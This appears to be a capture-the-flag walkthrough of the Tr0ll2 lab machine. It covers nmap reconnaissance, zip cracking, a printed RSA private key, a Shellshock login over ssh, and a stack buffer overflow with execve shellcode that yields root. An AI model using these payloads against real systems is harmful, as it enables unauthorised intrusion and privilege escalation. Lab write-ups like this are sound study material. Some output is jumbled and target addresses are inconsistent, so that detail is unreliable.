Reconnaissance / Enumeration
Let's start with a basic nmap to the victim server.
nmap -A -sV -sC 192.168.1.77
nmap -A -sV -sC 192.168.1.77
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 12:42 PDT
Nmap scan report for 192.168.1.77
Host is up (0.00061s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:63:02:FD (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.1.77
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
Trying ftp anonymous login, I have failed.
Now, checking if this site has a robots.txt, I can see that there is.
Here is a list of files found in the robots.txt file.
Let's try the dont_bother folder, and see what happens. An easier way to validate which robots.txt works is to see save a list of dictionary words into dirbuster and test each one of them out.
Don't read the previous walkthroughs because the creator might change solutions to test our ctf skills.
Deep within y0ur_self for the answer
Something weird I found within the dont_bother folder was y0ur_self might be a folder to something secretive. Let's test that out. It looks like we have a bunch of base64 encoded password lists.
First, we must download the text file onto our computer.
wget http://192.168.1.77/y0ur_self/answer.txt
Next, we must decode the list and make a password list out of it.
Looking back at the source of http://192.168.1.77/, we can see that there are some clues that can lead us back to finding the password for the ftp server.
They are:
username: Tr0ll
password: Tr0ll
Let's try that.
Let's try using those credentials for ftp.
Bingo! It worked for the ftp server.
Let's download lmao.zip and see what we get.
Unfortunately, it gets harder, because the zip file is locked.
Let's see what we can get out of the decoded base64 "password" file.
First, let's sort the file answerDecoded.txt by doing a:
cat answerDecoded.txt | sort
I will now use my python zip cracker program at: https://gist.github.com/natekhchan/841b8332e71aef3b4ae8049672f680bf to see whether I can crack the zip file.
I found the password to the file which is: ItCantReallyBeThisEasyRightLOL
Once cracked, there is a noob file which is a RSA private key.
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----
We get a private key like this.
We also can do a chmod 600 to make the RSA key readable to ssh.
We then, do an ssh noob@192.168.1.77 -i noob
root@kali:~/Desktop/troll2# chmod 600 noob
root@kali:~/Desktop/troll2# ssh noob@192.168.56.101 -i noob
TRY HARDER LOL!
Connection to 192.168.56.101 closed.
We get back a message saying that the connection is closed.
But, there must be some sort of something that is wrong with .bashrc that makes it echo TRY HARDER LOL!
Let's see if the server is vulnerable to BASH Shellshock injection? It is indeed.
root@kali:~# ssh noob@192.168.1.77 -i noob -t '() { :;}; /bin/bash'
noob@Tr0ll2:~$ id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
After logging in, we must upgrade the TTY python shell.
Here are the commands we have inputted and enumeration we have got.
noob@Tr0ll2:~$ ls
noob@Tr0ll2:~$ cd ..noob@Tr0ll2:/home$ ls
maleus noob tr0ll
noob@Tr0ll2:/home$ cd tr0ll
noob@Tr0ll2:/home/tr0ll$ ls
lmao.zip
noob@Tr0ll2:/home/tr0ll$ whoami
noob
noob@Tr0ll2:/home/tr0ll$ python -c 'import pty; pty.spawn("/bin/bash")'
noob@Tr0ll2:/home/tr0ll$ uname -a
Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
noob@Tr0ll2:/home/tr0ll$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
noob@Tr0ll2:/home/tr0ll$ cd /
noob@Tr0ll2:/$ ls
noob@Tr0ll2:/$ cd /nothing_to_see_here/
noob@Tr0ll2:/nothing_to_see_here$ ls
choose_wisely
noob@Tr0ll2:/nothing_to_see_here$ cd choose_wisely/
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls
door1 door2 door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ cd door1
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ls
r00t
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ cd ..
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -la
total 20
drwsr-xr-x 5 root root 4096 Oct 4 2014 .
drwsr-xr-x 3 root root 4096 Jul 30 13:00 ..
drwsr-xr-x 2 root root 4096 Oct 5 2014 door1
drwsr-xr-x 2 root root 4096 Oct 4 2014 door2
drwsr-xr-x 2 root root 4096 Oct 5 2014 door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ du -sh *
16K door1
12K door2
12K door3
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$
Now, let use try fuzzing the number of A's it takes to create an Illegal Instruction pointer.
./r00t $(python -c 'print "A" *300')
That is when we can inject code into the process.
Now we found that the program stack pointer is at 0xbffffb70 after the segmentation fault. Now what that means is that at that memory location their are no more assembly instruction what we will do is write shellcode into that adjacent memory location that spawns a bash shell. I found the shellcode to spawn a bash shell from this website.
Program received signal SIGILL, Illegal instruction.
0xb7e45400 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6(gdb) i r esp
esp 0xbffffb70 0xbffffb70
(gdb)
./r00t $(python -c 'print "A"*268 + "\x70\xfb\xff\xbf" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
noob@Tr0ll2: id
a70354f0258dcc00292c72aab3c8b1e4
# iduid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A"*268 + "\x70\xfb\xff\xbf" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������# cd /root# ls
Proof.txt core2 core4 hardmode ran_dir.py
core1 core3 goal lmao.zip reboot
# id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)
# cat Proof.txt
You win this time young Jedi...
a70354f0258dcc00292c72aab3c8b1e4
No comments:
Post a Comment